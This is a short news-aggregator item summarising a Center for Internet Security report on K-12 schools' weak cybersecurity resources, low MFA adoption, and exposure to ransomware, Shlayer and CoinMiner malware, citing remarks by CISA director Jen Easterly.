    HSToday reports "GAO Tells DOD to Ensure Cyber Incidents are Properly Reported and Shared"

  • news

    Visible to the public "K-12 Schools Lack Resources, Remaining Top Target for Cyberattacks"

    According to a new report published by the Center for Internet Security (CIS), the K-12 sector remains a top target for cyberattacks, despite the improvement of security capabilities over time. The CIS report reveals that the education sector lags behind other sectors in cyber maturity due to limited internal resources for defense against threat actors, with nearly a fifth of K-12 schools spending less than 1 percent of their Information Technology (IT) budget on cybersecurity. It also discovered that 81 percent of K-12 schools do not fully implement multi-factor authentication (MFA), and 29 percent do not use MFA at all. The report follows the US Homeland Security Department's Cybersecurity and Infrastructure Security Agency (CISA) hosting a national summit on K-12 school safety and security to address the industry's complex threats. During the event, Jen Easterly, director of CISA, stated that ransomware is one of the most impactful and persistent threats targeting K-12 schools and districts, which is consistent with the CIS report. CISA recently launched an information channel to share ransomware-related resources in response to the increasing frequency of ransomware attacks. Aside from ransomware threats, the report discovered that Shlayer and CoinMiner were two of the top malicious malware targeting K-12 entities in the last year. Shlayer targets Apple macOS devices, acting as a dropper for other macOS malware designed to spam victims with online ads, whereas CoinMiner mines for coins using Windows Management Instrumentation (WMI). According to Easterly, these threat actors are not "discriminatory" and target schools of all sizes and locations. This article continues to discuss the targeting of K-12 schools by cyberattacks and efforts to improve K-12 sector security against cyberattacks.

    SC Magazine reports "K-12 Schools Lack Resources, Remaining Top Target for Cyberattacks"